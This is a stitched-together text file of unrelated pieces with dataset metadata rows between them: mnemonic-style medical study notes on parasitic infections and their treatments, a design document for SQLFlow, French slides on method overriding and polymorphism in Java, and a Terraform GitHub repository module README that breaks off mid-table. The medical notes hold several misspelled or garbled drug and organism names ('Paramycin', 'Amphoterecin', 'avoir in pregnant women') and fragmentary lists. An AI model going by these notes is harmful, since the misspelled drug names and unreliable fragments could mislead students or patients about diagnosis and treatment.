- red cups: Trophozoites with endocytosed red blood cells under microscope, **pseudopods** looking
- flask: Intestinal biopsy may show flask-shaped lesions



<!-- entamoeba histolytica treatment -->

- Metronidazole drug of choice treatment
- pair of mice: Paramycin - luminal agent to eliminate cysts
- queen iodus: Iodoquinol - luminal agent to eliminate cysts
## Cryptosporidium
<!-- cryptosporidium demographics, transmission -->

- cane: Severe diarrhea in HIV patients
- Cryptosporidium outbreaks have been associated with **drinking water supplies, swimming pools**, and **recreational water facilities**.
<!-- cryptosporidium 2 phases, pathogenesis, transmission -->

- bubbles: Infectious cysts passed through stool
- pipe: Sporozoites attach to intestinal wall, cause diarrhea and small intestine damage
<!-- cryptosporidium stain and histology -->
- crystals: Cysts composed of 4 motile trophozoites
- cape: Stains **acid fast**


<!-- Cryptosporidium treatment -->

- knit a sock: Nitazoxanide treatment
- sock: Filtration can remove oocysts from water
- spirit bird: Spiramycin treatment
# Protozoa of the CNS
## Toxoplasmosis
<!-- toxoplasmosis transmission and demographics -->

- cane: Immunocompromised at risk; immunocompetent asymptomatic
- pregnant lady: Pregnant women at risk of transplacental transfer
- bowl of meat: Cysts in undercooked meat
- litter box and poop: T. gondii can be transmitted by cat feces
- bird eggs in poops: Oocysts in feces
<!-- toxoplasmosis adult symptoms and diagnosis -->

- extra lenses: Brain abscesses. **Multiple** ring enhancing lesions on CT or MRI
- red: turban: Encephalitis
- ping sticking out turban: Brain biopsy to differentiate from CNS lymphoma

<!-- toxoplasmosis congenital symptoms -->

- cat dressed as statue of liberty: ToRCHeS infection
- milk on head: Congenital Toxoplasmosis: intracranial calcifications
- bowl stuck on head, shaking: Congenital Toxoplasmosis: hydrocephalus and seizures
- flash bulb looking like retina: Congenital Toxoplasmosis: Chorioretinitis
- beethoven: Congenital Toxoplasmosis: Deafness


<!-- toxoplasmosis treatment and prophylaxis -->

- dyed sulfa eggs: Sulfadiazine
- pyramid on eggs: Pyrimethamine
- $100 with cane: Prophylaxis for CD4 count <100
- IgG key with positive kite: Prophylaxis for CD4 count <100 and seropositive for IgG
- egg without pyramid: TMP-SMX for prophylaxis
## Trypanosoma brucei
<!-- trypanosoma bruceii features, motility -->

- multi colored tent: Variable surface glycoprotein coats, undergoing constant antigenic variation, thus recurrent fevers
- single ribbon: Motile with flagella

<!-- traypanosoma brucei causes, transmission, 2 species -->

- Sleeping beauty: African sleeping sickness
- Tea fly: Tsetse fly vector, bite
- map with pins: Gambiense, Rhodesiense
<!-- trypanosoma bruceii symptoms -->

- sleeping: Coma
- necklace: Cervical lymphadenopathy
- cloth: Axillary lymphadenopathy
- undulating hills: Recurrent fevers
<!-- trypanosoma bruceii diagnosis -->

- blood on finger and goat: Trypomastigotes seen on blood smear

<!-- trypanosoma bruceii treatment -->

- bar of mela soap: Melarsoprol treatment - CNS infection
- bottle of serum: Suramin treatment for serum - Peripheral blood infection
## Naegleria fowleri
<!-- Naegleria fowleri causes -->
- brain eating amoeba disease: primary amoebic meningoencephalitis
<!-- Naegleria fowleri demographics, geography, transmission -->

- Nigeria fall: Naegleria fowleri
- scene: Associated with freshwater
- wind surfing dude: Associated with patients involved in water-sports
- water bottles: Associated with nasal irrigation systems and contact lens solution
<!-- Naegleria fowleri pathogenesis, symptoms -->

- cribs: Enters CNS via cribiform plate
- neck brace, red turban: primary amoebic Meningoencephalitis, inflammation of brain/meninges. Fever, neck stiffness, headache
- head on rock: Rapidly fatal, poor prognosis
<!-- Naegleria fowleri diagnosis, treatment -->

- needle in bottle: Lumbar puncture for diagnosis
- frogs: Amphoterecin treatment


# Protozoa of Blood
## Trypanosoma cruzi
<!-- trypanosoma cruzi causes -->

- Che Guevara. Che's Gas: Chagas disease, South and Central America, like Che
<!-- trypanosoma cruzi transmission -->

- "Kissing Bug" bites around victim's mouth, and deposits feces which can later be introduced by scratching area
- bugs, **red** on heart: Transmitted by **Red**uviid, or "Kissing bug"

<!-- trypanosoma cruzi symptoms -->

- asympatomatic acutely. Symptoms several years later
- swollen colon: Megacolon with constipation
- Tunneled up mole: Burrows into endocardium
- floppy heart on bike: Dilated cardiomyopathy
- snake with dilated snake: Mega-esophagus
<!-- typanosoma cruzi diagnosis -->

- leaked red gas: Diagnosed by blood smear
- red on heart: Trypanosomes may be seen within cardiac mycocytes on heart biopsy

cardiac biopsy:

<!-- trypanosoma cruzi treatment -->

- Furry, knee high moccasin boots: Nifurtimox treatment
## Babesia
<!-- babesia causes -->

- Vampire babes: Babesiosis
- Blood-related symptoms
<!-- babesia geography, demographics, transmission -->

- NE cross: NE United States
- Robin of Ixodes: Ixodes tick
- tick shield: tick-borne illness
- deer antlers: Ixodes tick is a deer tick
- sickle: Higher risk of severe disease in sickle cell disease
- hole in robin's shirt: Higher risk of severe disease in asplenia
<!-- babesia symptoms -->

- cracked blood stained windows: Hemolytic anemia
- yellow babe: Jaundice
- Sweating robin: fever
- torn robin shirt: Irregularly cycling fevers
<!-- babesia diagnosis -->

- thick red floor: Babesioisis diagnosied by thick blood smear
- maltese cross: Maltese cross appearance in red blood cells, tetrad of trophozoites, differentiates from malaria


<!-- babesiosis treatment -->

- crows: ma-crow-lide: azithromycin treatment
- Ato-vampire queen: atovaquone treatment
## Plasmodium
<!-- Plasmodium causes -->

- Malaria, especially in Africa
<!-- plasmodium different species, symptoms, and infect -->

mal area: Plasmodium malariae
- buttons 1 and 4 colored like sun: Quartan fever cycle (72 hrs)
- Only infects mature RBC
oval shield and axe: Plasmodium vivax and ovale
- Only infects immature RBC
- Hypnotist: P. vivax and P. ovale produce dormant hypnozoites, hides in liver
- cow hide and liver spot: Hypnozoites in hepatocytes
- Pendulum: Tertian fever cycle (48 hrs)
False mask: Plasmodium flaciparum
- Infects all RBC
- irregular torn shirt: irregular fever
- red head dress: Cerebral malaria, parasitized RBC occlude capillaries in brain
- banana head dress: RBC banana shaped on blood smear
- gold belt: Parasitized RBC's occlude vessels to kidneys
- gold chest plate: Parasitized RBC's occlude vessels to lungs, pulmonary edema
<!-- plasmodium diseases protective against -->

- sickle: Sickle cell, thalassemia, G6PD deficiency disease is protective against P. falciparum
<!-- Plasmodium general treatment, treatment for resistant species, prophylaxis -->

- "Color queen" - chloroquine, beads join together as polymer, blocking plasmodium **heme polymerase**. High resistance
- "Primal queen" - primaquine, can cause anemia in G6PD deficiency. Only treats **hypnozoites**
- "Me-flock queen" - mefloquine, extra strong
- backpack: Mefloquine prophylaxis for travelers to chloroquine resistant areas
- "Ato-vampire queen" - atovaquone, strong
- Iguana: Proguanil
- backpack: Atovaquone/proguanil for travelers to chloroquine resistant areas
**Chloroquine** is effective in eradicating chloroquine-sensitive plasmodia from the bloodstream, but it has no activity against the latent hepatic infections established by _P vivax_ and _P ovale_. **Primaquine** must be added to the regimen to completely eradicate the **hypnozoites**.
Primaquine has limited therapeutic activity against the erythrocytic forms of plasmodia, including trophozoites. Primaquine is not effective in treating chloroquine-resistant strains, which can be managed with mefloquine or quinine, among others.
No antimalarial agent specifically acts to prevent hemolysis. Primaquine is contraindicated in patients with glucose-6-phosphate dehydrogenase deficiency as the medication can cause hemolysis.
<!-- Plasmodium backup treatment for severe infections, given how -->

- artist: Use artemisins for severe P. falciparum infections
- artist: Use IV artesunate for severe malaria infections; backup
- "Dining queen" - quinidine; backup
- Ivy: Artesunate and quinidine are delivered IV for severe malaria
<!-- quinidine se -->

- tin cans: Side effect of quinidine is cinchonism, including tinnitus/headaches
<!-- plasmodium life cycle -->

- mushroom: Anopheles mosquitoes carry **sporozoites** in saliva. Biting transmission to blood and then liver
- liver spot: Sporozoites mature to **trophozoites** in liver. Divide and cause RBC to become less flexible = splenomegaly
- RBC and small merozoites: Schizont divides into **merozoites** which burst from hepatocyte and infect RBCs
- lifecycle continues in RBC: trophozoite -> schizont -> merozoites -> infect RBC
- ring spot: Ring form of immature schizont
- male/female symbol: Merozoite can also form gametocyte, ingested by female mosquitos and stored in saliva
Mosquito bite releases **sporozoites** into the bloodstream, which are eventually carried to the liver to **infect hepatocytes**. In hepatocytes, **sporozoites divide into merozoites** and are eventually released from hepatocytes to infect red blood cells (RBCs)
In RBCs, **merozoites develop into trophozoites**, which divide and eventually **cause infected RBCs to become less flexible**. These infected RBCs accumulate and are destroyed in the spleen, leading to **splenomegaly**.
In addition, trophozoites in infected RBCs can **mature into schizonts, which rupture the RBC membrane**, releasing merozoites that go on to infect other RBCs.
To complete the cycle, some **merozoites turn into gametocytes**, which are **ingested by female mosquitoes**. In the mosquito, gametocytes fuse forming a diploid zygote, which generates haploid sporozoites that are stored in mosquito salivary glands.
<!-- plasmodium stain, histology shows -->

- Gems with blood smear: Blood stain and Giemsa stain to see parasites in RBCs
- Schuffner dots: Schüffner dots are unique to _P. vivax/ovale_ and are **morphologic changes that occur in infected host erythrocytes**. They are visible by light microscopy in blood smears, and appear as **multiple brick-red dots**.

- ring shaped P. vivax

- schizont

- banana shaped P. falciparum

## Leishmaniasis
<!-- Leishmaniasis host and transmission -->

- undeed brazilian man with brazillian flag: Leishmania Braziliensis - vertebrates are host
- sand flies around zombie: Sandfly vector
<!-- leishmaniasis cutaneous cause, symptoms, histology, treatment -->

- Leishmania braziliensis - cutaneous leishmaniasis, consumes flesh of victim and causes ulcers
- goat inside cages: Amastigote is intracellular form, seen within macrophages
- T bone steak: Stibugluconate treatment for cutaneous leishmaniasi

- amastigote in macrophages:

<!-- leishmaniasis visceral cause, symptoms, treatment -->

- Donovin: Visceral leishmaniasis caused by Leishmania Donovani
- black spots and sweating: Black fever, or kala-azar
- empty pan: Bone marrow affected causing pancytopenia
- sweating: Fevers
- cow with spots: Hepatosplenomegaly
- frogs: Amphoterecin B for visceral leishmaniasis
# Intestinal nematodes
## Enterobius vermicularis
<!-- enterobius vermicularis aka, cause, pathogenesis, diagnosis, treatment -->

- Vermin lady: Enterobius vermicularis, pin worm
- crawling out of round hole with eggs at bottom: Female pin worms lay eggs at the anus
- rats eating rocks: Fecal oral route. Scratch and put in mouth = auto infect
- long cape with rocks: Scotch tape test shows eggs under the microscope
- PAM: pyrantel pamoate
- bending metal bars: albendazole
- on tape:

## Ancyclostoma duodenale and necator
<!-- hookworms are, transmission, pathogenesis, symptoms, labs, treatment -->

- American dude, Ankle strings: Ancyclostoma duodenale
- American dude: Neck strings: Necator americanus
- hook: hookworm
- red boots: Hookworm larvae penetrate skin of soles of feet (walking bare foot)
- arrow on suit: blood stream —> lungs (coughed and swallowed) —> GI tract
- iron dangling with microcytic and hypochromic holes: iron deficiency anemia
- grenades fallen in water: eggs in stool
- Eo sling shot boy with bilobe sling shot: eosinophilia
- PAM: pyrantel pamoate
- bending metal bars: albendazole. Secondary
- cutaneous larva migrans:

## A. Lumbricoides
<!-- Ascaris lumbricoides aka, transmission, pathoenesis, symptoms, diagnosis, treatment -->

- lumber man: Ascaris lumbricoides, large round worm
- eating eggs in contaminated food/water
- arrow on suit: blood stream —> lungs (coughed and swallowed) —> GI tract
- bronchial tree on chest: respiratory symptoms
- rocks obstructing: intestinal obstruction at ileocecal valve, malnutrition
- Acorn in puddle: diagnosis by eggs in feces
- Eosinophil granules: eosinophilia
- bending metal bars: albendazole, microtubule inhibitor (avoir in pregnant women)


## Strongyloides
<!-- strongyloides transmission, pathogenesis, diagnosis, treatment -->

- Strong guy: Strongyloides stercoralis
- red boots: larvae penetrate skin of soles of feet
- arrow on suit: blood stream —> lungs (coughed and swallowed) —> GI tract
- round rocks in wall: Autoinfection: Strongyloides larvae hatch from eggs laid in intestinal wall, repenetrate wall, enter blood stream to lungs
- larvae in water: diagnosis by larvae in stool, not eggs
- Eosinophil granules: eosinophilia
- bending metal bars: albendazole, microtubule inhibitor (avoir in pregnant women)
- river mectin, no dumping, drain to river sign: ivermectin


## Trichinella
<!-- trichinella transmission, pathogenesis, symptoms, diagnosis, treatment -->

- Spiral tricksters: Trichinella spiralis
- pork: undercooked pork/bear
- red pipes: Larvae enter blood stream
- striated brick wall: Larvae travel to striated muscle
- explosives on wall: Larvae form cysts within striated muscle
- red glasses: Periorbital edema
- green drool: Vomiting
- sweat: Fever
- fire: muscle inflammation, myalgia
- Eosinophil granules: eosinophilia
- bending metal bars: albendazole, microtubule inhibitor (avoir in pregnant women)

# Tissue Nematodes
## Dracunculus Medinensis
<!-- dracunculus medinensis transmission, symptoms, treatment -->

- Dracula: Dracunculus medinensis
- water cooler and cupapods cup: D. medinensis transmitted by water contaminated with copepods containing larvae
- Larvae in copepods
- Untied shoe laces: Adult females emerge from painful ulcer in skin
- eo sling shot boy: Eosinophilia
- Shoe lace around water cooler: extract via match stick and twist slowly


## Onchocerca Volvulus
<!-- onchocerca volvulus causes, transmission, symptoms, diagnosis, treatment -->

- Onchocerca volvulus, river blindness
- black fly bites human host, infiltrates skin, mature to adults, produce microfilariae
- chemical stains: Hyper and hypo-pigmented spots occur with onchodermatitis
- hand cover eyes: Microfilariae in eye cause blindness
- pink granules: Eosinophilia
- microscopes: Microfilariae seen in skin biopsy under microscope
- rivermectin sign: Ivermectin
- in vesicles:

## Wuchereria bancrofti
<!-- wuchereria bancrofti transmission, symptoms, diagnosis, treatment -->

- Witch craft: Wuchereria bancrofti
- mosquitos flying around: W. Bancrofti transmitted by mosquitos
- large pants: Elephantiasis: long standing lymphedema
- ruffled collar and arm pit: Lymphadenopathy
- coughing: Cough from microfilariae in lungs
- thick smear of blood on hat: Organisms seen on thick blood smear
- granules: Eosinophilia
- Diet and carb magazine: Diethylcarbamazine


## T. Canis
<!-- T. canis aka, transmission, symptoms, treatment -->

- wolfman: Toxocara canis
- aka visceral larva migrans
- stinky poop bag: T. canis transmitted by ingesting food contaminated with dog or cat feces
- larva migrans: never mature, circulates body as larva
- sleep mask: Ocular larva migrans leads to blindness
- granules: Eosinophilia
- bending metal chair legs: Albendazole

## Loa Loa
<!-- loa loa symptoms, diagnosis, treatment -->

- loa loa lagoon
- flies: L. loa transmitted by deer flies
- lumps over arms/legs: Local subcutaneous swellings. _Loa loa_ causes **transient subcutaneous areas of localized angioedema and erythema on the extremities and face** known as Calabar swellings. Pain or itching may precede the development of these lesions.
- worm in eye ball: Adult worms can migrate across conjunctiva
- thick smear of blood on face: Organisms seen on thick blood smear
- granules: Eosinophilia
- Diet and carb magazine: Diethylcarbamazine
- bending chair: Albendazole

[_]()

- Intermediate host for T. saginata is cattle
- Intermediate host for T. solium is pigs
- Taenia solium
- Taenia saginata
- Hooks on proglottid heads of T. solium seen on O\&P
- Neurocysticercosis - causes seizures. "Swiss cheese" appearance on head CT.
- Ingest egg in stool: neurocysticercosis
- Ingest larvae in meat: intestinal infection
- Taenia eggs transmitted by water contaminated with animal feces
- Praziquantel treatment
- Albendazole treatment
- Diphyllobothrium latum \xe2\x80\x93 fish tapeworm
- B12 deficiency
- Cobalamin deficiency
- Megaloblastic anemia
- Proglottid segments seen on stool O\&P
- D. latum is the longest tapeworm
- Praziquantel
- Niclosamide treatment
- Echinococcus granulosus
- Dogs are definitive host, sheep are intermediate host for E. granulosus
- E. granulosus transmitted by dog feces
- Eggshell calcifications in cyst on liver CT
- Hydatid cyst in liver
- Cysts rupture causes an anaphylactic reaction and acute abdomen
- Eosinophilia

- Swimmers at risk of infection
- Snails are intermediate host
- Migrate against portal flow
- Schistosoma mansoni
- Schistosoma japonicum
- S. mansoni - large lateral spine
- Paragonimus westermani
- S. japonicum - small spine
- Portal hypertension
- Jaundice
- S. haematobium - large terminal spine
- Hematuria
- S. haematobium - risk of bladder cancer
- Praziquantel treatment
- Snails are intermediate host
- Snails are intermediate host
- Clonorchis sinensis
- Biliary fibrosis
- Cholangiocarcinoma
- Pigmented gallstones
- Operculated eggs on O\&P
- Praziquantel treatment
- Chronic cough with bloody sputum
- Transmitted through consumption of raw or undercooked crab meat with larvae
- Operculated eggs on O\&P
- Praziquantel treatment
| 35.924863 | 288 | 0.769365 | eng_Latn | 0.742879 |
61cc7764b7adab232e9615054d6df98497acd7af | 8,486 | md | Markdown | doc/syntax.md | uuleon/sqlflow | cf2ad28b5b9b14b6744f6561e8fe47d85b282498 | [
"Apache-2.0"
] | 1 | 2019-05-27T06:06:30.000Z | 2019-05-27T06:06:30.000Z | doc/syntax.md | uuleon/sqlflow | cf2ad28b5b9b14b6744f6561e8fe47d85b282498 | [
"Apache-2.0"
] | 1 | 2019-10-11T03:31:10.000Z | 2019-10-11T03:31:10.000Z | doc/syntax.md | uuleon/sqlflow | cf2ad28b5b9b14b6744f6561e8fe47d85b282498 | [
"Apache-2.0"
] | null | null | null | # SQLFlow: Design Doc
## What is SQLFlow
SQLFlow is a bridge that connects a SQL engine, for example, MySQL, Hive, SparkSQL, Oracle, or SQL Server, and TensorFlow and other machine learning toolkits. SQLFlow extends the SQL syntax to enable model training and inference.
## Related Work
We could write simple machine learning prediction (or scoring) algorithms in SQL using operators like [`DOT_PRODUCT`](https://thenewstack.io/sql-fans-can-now-develop-ml-applications/). However, this requires copy-n-pasting model parameters from the training program into SQL statements.
Some proprietary SQL engines provide extensions to support machine learning.
### Microsoft SQL Server
Microsoft SQL Server has the [machine learning service](https://docs.microsoft.com/en-us/sql/advanced-analytics/tutorials/rtsql-create-a-predictive-model-r?view=sql-server-2017) that runs machine learning programs in R or Python as an external script:
```sql
CREATE PROCEDURE generate_linear_model
AS
BEGIN
EXEC sp_execute_external_script
@language = N'R'
, @script = N'lrmodel <- rxLinMod(formula = distance ~ speed, data = CarsData);
trained_model <- data.frame(payload = as.raw(serialize(lrmodel, connection=NULL)));'
, @input_data_1 = N'SELECT [speed], [distance] FROM CarSpeed'
, @input_data_1_name = N'CarsData'
, @output_data_1_name = N'trained_model'
WITH RESULT SETS ((model varbinary(max)));
END;
```
A challenge to the users is that they need to know not only SQL but also R or Python, and they must be capable of writing machine learning programs in R or Python.
### Teradata SQL for DL
Teradata also provides a [RESTful service](https://www.linkedin.com/pulse/sql-deep-learning-sql-dl-omri-shiv), which is callable from the extended SQL SELECT syntax.
```sql
SELECT * FROM deep_learning_scorer(
ON (SELECT * FROM cc_data LIMIT 100)
URL('http://localhost:8000/api/v1/request')
ModelName('cc')
ModelVersion('1')
RequestType('predict')
columns('v1', 'v2', ..., 'amount')
)
```
The above syntax couples the deployment of the service (the URL in the above SQL statement) with the algorithm.
### Google BigQuery
Google [BigQuery](https://cloud.google.com/bigquery/docs/bigqueryml-intro) enables machine learning in SQL by introducing the `CREATE MODEL` statement.
```sql
CREATE MODEL dataset.model_name
OPTIONS(model_type='linear_reg', input_label_cols=['input_label'])
AS SELECT * FROM input_table;
```
Currently, BigQuery only supports two simple models: linear regression and logistic regression.
## Design Goal
None of the above meets our requirement.
First of all, we want to build an open source software. Also, we want it to be extensible:
- We want it extensible to many SQL engines, instead of targeting any one of them. Therefore, we don't want to build our syntax extension on top of user-defined functions (UDFs); otherwise, we'd have to implement them for each SQL engine.
- We want the system extensible to support sophisticated machine learning models and toolkits, including TensorFlow for deep learning and [xgboost](https://github.com/dmlc/xgboost) for trees.
Another challenge is that we want SQLFlow to be flexible enough to configure and run cutting-edge algorithms, including specifying [feature crosses](https://www.tensorflow.org/api_docs/python/tf/feature_column/crossed_column). At the same time, we want SQLFlow easy to learn -- at least, no Python or R code embedded in the SQL statements, and integrate hyperparameter estimation.
We understand that a key to address the above challenges is the syntax of the SQL extension. To craft a highly-effective and easy-to-learn syntax, we need user feedback and fast iteration. Therefore, we'd start from a prototype that supports only MySQL and TensorFlow. We plan to support more SQL engines and machine learning toolkits later.
## Design Decisions
As the beginning of the iteration, we propose an extension to the SQL SELECT statement. We are not going a new statement way like that BigQuery provides `CREATE MODEL`, because we want to maintain a loose couple between our system and the underlying SQL engine, and we cannot create the new data type for the SQL engine, like `CREATE MODEL` requires.
We highly appreciate the work of [TensorFlow Estimator](https://www.tensorflow.org/guide/estimators), a high-level API for deep learning. The basic idea behind Estimator is to implement each deep learning model, and related training/testing/evaluating algorithms as a Python class derived from `tf.estimator.Estimator`. As we want to keep our SQL syntax simple, we would make the system extensible by calling estimators contributed by machine learning experts and written in Python.
The SQL syntax must allow users to set Estimator attributes (parameters of the Python class' constructor, and those of `train`, `evaluate`, or `predict`). Users can choose to use default values. We have a plan to integrate our hyperparameter estimation research into the system to optimize the default values.
Though estimators derived from `tf.estimator.Estimator` run algorithms as TensorFlow graphs; SQLFlow doesn't restrict that the underlying machine learning toolkit has to be TensorFlow. Indeed, as long as an estimator provides methods of `train`, `evaluate`, and `predict`, SQLFlow doesn't care if it calls TensorFlow or xgboost. Precisely, what SQLFlow expect is an interface like the following:
```python
class AnEstimatorClass:
__init__(self, **kwargs)
train(self, **kwargs)
evaluate(self, **kwargs)
predict(self, **kwargs)
```
We also want to reuse the [feature columns API](https://www.tensorflow.org/guide/feature_columns) from Estimator, which allows users to columns of tables in a SQL engine to features to the model.
## Extended SQL Syntax
Again, just as the beginning of the iteration, we propose the syntax for training as
```sql
SELECT * FROM kaggle_credit_fraud_training_data
LIMIT 1000
TRAIN DNNClassifier /* a pre-defined TensorFlow estimator, tf.estimator.DNNClassifier */
WITH layers=[100, 200], /* a parameter of the Estimator class constructor */
train.batch_size = 8 /* a parameter of the Estimator.train method */
COLUMN *, /* all columns as raw features */
cross(v1, v9, v28) /* plus a derived (crossed) column */
LABEL class
INTO sqlflow_models.my_model_table; /* saves trained model parameters and features into a table */
```
We see the redundancy of `*` in two clauses: `SELECT` and `COLUMN`. The following alternative can avoid the redundancy, but cannot specify the label.
```sql
SELECT * /* raw features or the label? */
corss(v1, v9, v28) /* derived featuers */
FROM kaggle_credit_fraud_training_data
```
Please be aware that we save the trained models into tables, instead of a variable maintained by the underlying SQL engine. To invent a new variable type to hold trained models, we'd make our system tightly integrated with the SQL engine, and harms the extensibility to other engines.
The result table should include the following information:
1. The estimator name, e.g., `DNNClassifier` in this case.
1. Estimator attributes, e.g., `layer` and `train.batch_size`.
1. The feature mapping, e.g., `*` and `cross(v1, v9, v28)`.
Similarly, to infer the class (fraud or regular), we could
```sql
SELECT * FROM kaggle_credit_fraud_development_data
PREDICT kaggle_credit_fraud_development_data.class
USING sqlflow_models.my_model_table;
```
## System Architecture
### A Conceptual Overview
In the prototype, we use the following architecture:
```
SQL statement -> our SQL parser --standard SQL-> MySQL
\-extended SQL-> code generator -> execution engine
```
In the prototype, the code generator generates a Python program that trains or predicts. In either case,
1. it retrieves the data from MySQL via [MySQL Connector Python API](https://dev.mysql.com/downloads/connector/python/),
1. optionally, retrieves the model from MySQL,
1. trains the model or predicts using the trained model by calling the user specified TensorFlow estimator,
1. and writes the trained model or prediction results into a table.
### Working with Jupyter Notebook and Kubernetes
The following figure shows the system components and their runtime environment. The left part shows how to run the system on a PC/laptop, and the right part shows how to run it on a Kubernetes cluster.

| 52.708075 | 483 | 0.763846 | eng_Latn | 0.988037 |
61cc93f6323fc6e7a3b4815aba07beb049bce83d | 3,114 | md | Markdown | .vuepress/public/cours/sources/poo_redefinition_polymorphisme/slides.md | MataReDev/bts-sio | 728a93f57b3a783640c2e0e253ce699ccba7888f | [
"MIT"
] | 2 | 2021-10-04T20:06:06.000Z | 2021-12-07T21:06:00.000Z | .vuepress/public/cours/sources/poo_redefinition_polymorphisme/slides.md | MataReDev/bts-sio | 728a93f57b3a783640c2e0e253ce699ccba7888f | [
"MIT"
] | null | null | null | .vuepress/public/cours/sources/poo_redefinition_polymorphisme/slides.md | MataReDev/bts-sio | 728a93f57b3a783640c2e0e253ce699ccba7888f | [
"MIT"
] | null | null | null | # Redéfinition & Polymorphisme
Par [Valentin Brosseau](https://github.com/c4software) / [@c4software](http://twitter.com/c4software)
---
## La redéfinition
---

- Qu'observez-vous ?
---

- Que va-t-il se passer ?
---
<iframe src="https://giphy.com/embed/f3GoWhH08FxtUeeu0B" width="480" height="273" frameBorder="0" class="giphy-embed" allowFullScreen></iframe>
---
```java
class Animal{
public void move(){
// Implémentation du déplacement
}
}
class Dog extends Animal {
@Override
public void move(){
// Implémentation du déplacement différente du parent
}
public void bark(){
// Le chien fait ouaf.
}
}
```
- Que constatez-vous ?
---
## Pratique! Mais…
### Si l’on souhaite spécialiser et pas remplacer ?
---
```java
class Animal{
public void bruit(){
System.out.print("BRUUUUIIIITTTT");
}
}
class Humain extends Animal {
@Override
public void bruit(){
super.bruit()
System.out.print(" (Oui mais compréhensible)");
}
}
```
- Quel élément est important ?
---
Que va afficher le programme suivant ?
```java
$humain = new Humain();
$humain.bruit();
```
---
```java
abstract class Animal{
abstract void bruit();
}
class Humain extends Animal {
@Override
public void bruit(){
super.bruit()
System.out.print(" (Oui mais compréhensible)");
}
}
```
- Est-ce possible ? Pourquoi ?
---
## Un instant… Mais ce n’est pas de la surcharge ?
<iframe src="https://giphy.com/embed/Y8hzdgPnZ6Hwk" width="480" height="379" frameBorder="0" class="giphy-embed" allowFullScreen></iframe>
---
Non !
Surcharge **≠** Redéfinition
<iframe src="https://giphy.com/embed/WrgAGkGrh0MD1Z2gkO" width="480" height="270" frameBorder="0" class="giphy-embed" allowFullScreen></iframe>
---
<fieldset>
<legend>Pour résumer, la redéfinition…</legend>
<li>Ne s'applique que dans l'héritage.</li>
<li>La signature des méthodes <u>doit-être identique</u>.</li>
<li>L'appel au parent est possible.</li>
<li>Surcharge ≠ Redéfinition</li>
</fieldset>
---
[Exercice de mise en application](https://cours.brosseau.ovh/cours/exercices/poo/redefinition.html)
---
## Le Polymorphisme
---
- Poly
- Morphisme
---
- Poly = **Plusieurs**
- Morphisme = **Forme**
---
- Classe B **"EST-UN"** Classe A.
- Toutes les méthodes de la classe A peuvent donc être appelées sur la classe B.
---

- Donnez-moi un exemple de **EST-UN**.
---
```java
Animal monLapin = new Lapin();
```
- Est-ce valide ?
- Notre objet sera…
- Un lapin ?
- Un Animal ?
---

- Que constatez-vous ?
---
<fieldset>
<legend>Le polymorphisme</legend>
<li>Est possible grâce à l'héritage.</li>
<li>Manipuler un objet sans en connaitre le type précis.</li>
<li>Des listes d'objets de type différent.</li>
</fieldset>
---
[Exercice de mise en application](https://cours.brosseau.ovh/cours/exercices/poo/polymorphisme.html)
---
## Des questions ?
| 16.652406 | 143 | 0.657354 | fra_Latn | 0.673876 |
61ccd7670b731abf79cb5523f512057c8bfe4d3f | 5,797 | md | Markdown | README.md | pitts-technologies/terraform-module-github-repo | 88b5dbe0bbe514a5e9d836bd1f4d7bcfb5287547 | [
"Apache-2.0"
] | 1 | 2020-09-13T16:17:23.000Z | 2020-09-13T16:17:23.000Z | README.md | michaelpitts/terraform-module-github-repo | 88b5dbe0bbe514a5e9d836bd1f4d7bcfb5287547 | [
"Apache-2.0"
] | null | null | null | README.md | michaelpitts/terraform-module-github-repo | 88b5dbe0bbe514a5e9d836bd1f4d7bcfb5287547 | [
"Apache-2.0"
] | null | null | null | # Terraform Module - Github Repository
A terraform module for creating repositories in your GitHub Organization.
This module is a "quick-and-dirty" way of achieving reusable, automated github repo provisioning & configuration. I would like to make org & team input optional, but the limitations of terraform's HCL configuration language have made this a challenge. With that said, the recent syntax improvements introduced in Terraform 0.12 release may open up some possibilities of improvement, and higher flexibility for this module.
Created using Terraform v0.11.13
## Requirements:
Set the following environment variables before running:
```export GITHUB_TOKEN=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx```
```export GITHUB_ORGANIZATION=your-org-name```
The account that is associated with the above token must have "owner" permissions on the organization that is referenced as an input variable.
This module requires the existance of a GitHub team to be given access to the repository.
## Branch Protection Inputs
The following input variables are intended to be written as a "list of maps". While this is more complex thatn granular parameters for each map, it allows the user to be more specific and flexible when setting details access policies.
### Required Status Checks
Example:
```hcl
required_status_checks = [
{
strict = false
contexts = ["ci/travis"]
}
]
```
### Required Pull Request Reviews
Example:
```hcl
required_pull_request_reviews = [
{
dismiss_stale_reviews = true
dismissal_users = ["foo-user"]
dismissal_teams = ["${var.github_team}", "${var.github_team_2}"]
}
]
```
### Restrictions
Example:
```hcl
restrictions = [
{
users = ["foo-user"]
teams = ["${var.github_team}"]
}
]
```
## Inputs
| Name | Description | Type | Default | Required |
|------|-------------|:----:|:-----:|:-----:|
| name | (Required) The name of the repository. | string | n/a | yes |
| allow\_merge\_commit | (Optional) Set to false to disable merge commits on the repository. | string | `"true"` | no |
| allow\_rebase\_merge | (Optional) Set to false to disable rebase merges on the repository. | string | `"true"` | no |
| allow\_squash\_merge | (Optional) Set to false to disable squash merges on the repository. | string | `"true"` | no |
| archived | (Optional) Specifies if the repository should be archived. Defaults to false. | string | `"false"` | no |
| auto\_init | (Optional) Set to true to produce an initial commit in the repository. | string | `"false"` | no |
| default\_branch | (Optional) The name of the default branch of the repository. NOTE: This can only be set after a repository has already been created, and after a correct reference has been created for the target branch inside the repository. This means a user will have to omit this parameter from the initial repository creation and create the target branch inside of the repository prior to setting this attribute. | string | `""` | no |
| description | (Optional) A description of the repository. | string | `""` | no |
| enforce\_admins | (Optional) Boolean, setting this to true enforces status checks for repository administrators. | string | `"false"` | no |
| gitignore\_template | (Optional) Use the name of the template without the extension. For example, \"Haskell\". | string | `""` | no |
| has\_downloads | (Optional) Set to true to enable the (deprecated) downloads features on the repository. | string | `"false"` | no |
| has\_issues | (Optional) Set to true to enable the GitHub Issues features on the repository. | string | `"false"` | no |
| has\_projects | (Optional) Set to true to enable the GitHub Projects features on the repository. Per the github documentation when in an organization that has disabled repository projects it will default to false and will otherwise default to true. If you specify true when it has been disabled it will return an error. | string | `"false"` | no |
| has\_wiki | (Optional) Set to true to enable the GitHub Wiki features on the repository. | string | `"false"` | no |
| homepage\_url | (Optional) URL of a page describing the project. | string | `""` | no |
| license\_template | (Optional) Use the name of the template without the extension. For example, \"mit\" or \"mpl-2.0\". | string | `""` | no |
| permission | (Optional) The permissions of team members regarding the repository. Must be one of pull, push, or admin. Defaults to pull. | string | `"pull"` | no |
